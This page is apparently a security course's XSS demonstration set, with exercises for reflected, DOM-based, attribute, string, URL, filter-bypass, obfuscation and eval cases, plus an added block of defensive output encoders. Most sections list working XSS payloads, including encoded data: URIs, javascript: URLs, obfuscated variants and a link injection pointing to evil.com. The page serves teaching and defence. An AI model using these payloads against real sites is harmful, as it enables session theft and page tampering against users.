Sam Bowne

XSS Demos

1. Reflected XSS

Message:

Pop up a box

Solution

<script>alert("Reflected XSS Vulnerability!");</script>

Another Payload

Error: please go to our <a href='http://evil.com'>our new page;</a>
Note: XSS Auditor stops this attack in Chrome and Safari on the Mac, and something blocks it in Opera. It works in Firefox.

2. More Reflected XSS Demos

3. Stored XSS Demos

4. DOM-Based XSS Demos

https://attack.samsclass.info/xss4.htm?message=hi

https://attack.samsclass.info/xss4.htm?message=<script>alert('Hi')</script>

5. Tag Attribute Value

Image Resizer

Height:
Width:

Solutions

50%'><script>alert(1)</script>

50%' onclick='alert(1)

6. JavaScript String

Variable a:

Solutions

'; alert(1); var b='

7. URL

URL:

Solutions

javascript:alert(1);

http://www.ccsf.edu' onclick='javascript:alert(1)
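
Defensive counterpart to demos 5-7, added here as an example and not part of the original page: one encoder per output context, exercised with the payloads listed above. The function names and the markup in renderDemo are hypothetical.

```javascript
// Added example: one encoder per output context from sections 5-7.
// Function names are hypothetical; the test inputs are this page's payloads.

// Section 5, quoted HTML attribute value: encode every character that can
// close the quotes or open a tag.
function encodeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Section 6, JavaScript string literal: \uXXXX-escape everything except
// alphanumerics and spaces, so quotes, backslashes, line breaks and
// "</script>" cannot end the literal or the script block.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Section 7, URL placed in href/src: accept only absolute http(s) URLs,
// then attribute-encode the normalized form. Anything else returns null.
function safeHref(value) {
  let url;
  try {
    url = new URL(String(value).trim());
  } catch (err) {
    return null; // relative or malformed input
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return encodeHtmlAttr(url.href);
}

// Build the three sinks with the encoders applied (markup is constructed).
function renderDemo(height, a, link) {
  const href = safeHref(link);
  return [
    "<img src='pic.jpg' height='" + encodeHtmlAttr(height) + "'>",
    "<script>var a='" + encodeJsString(a) + "';</script>",
    href === null ? '<span>link rejected</span>' : "<a href='" + href + "'>link</a>",
  ];
}
```

The scheme allowlist alone is not enough for the URL case: a single quote inside a URL path survives parsing, so safeHref still attribute-encodes whatever it accepts.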

8. Blocking SCRIPT Tags

Message:

Solutions

Third one works in Chrome!
<object data="data:text/html,<script>alert(1)</script>">

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click here</a>

9. Obfuscation

Message:

Examples

<script>alert(1);</script>

<xml onreadystatechange=alert(1)>

<input autofocus onfocus=alert(1)>

<x onclick=alert(1) src=a>Click here</x>

<script/anyjunk>alert(1);</script>

<img/onerror="alert(1)"src=a>

<img/anyjunk/onerror="alert(1)"src=a>

<<script>alert(1);<</script>

<script<{alert(1)}/></script>

<script>a\u006cert(1);</script>

<script>a\l\ert\(1\);</script>

<img onerror=eval('al\u0065rt(1)') src=a>

10. eval

Source Code

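<p id="demo">alert(1)</p>
<p>
<button onclick="myFunction()">Try it</button>
</p>
<script>
function myFunction() {
    // Read the paragraph's current contents as a string.
    var str = document.getElementById("demo").innerHTML;
    // replace() passes the matched text to its callback; with eval as the
    // callback, whatever is in #demo is executed as JavaScript.
    var res = str.replace(/.*/, eval);
    document.getElementById("demo").innerHTML = res;
}
</script>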

Live Code

alert(1)


Last modified: 4-16-2020